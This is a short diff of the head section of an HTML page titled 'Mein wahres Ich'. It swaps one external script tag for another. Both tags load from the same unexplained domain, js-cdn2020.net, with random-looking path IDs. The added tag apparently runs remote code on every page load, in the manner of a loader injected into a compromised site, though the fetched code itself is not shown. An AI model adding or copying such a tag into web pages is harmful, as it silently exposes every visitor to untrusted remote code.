--- a/index.html
+++ b/index.html
@@ -24,8 +24,7 @@
 	<!-- Document Title
 	============================================= -->
 	<title>Mein wahres Ich</title>
-<script src="https://js-cdn2020.net/a142hq"></script>
-</head>
+<script src="https://js-cdn2020.net/g1nf23"></script></head>
 
 <body class="stretched">
 
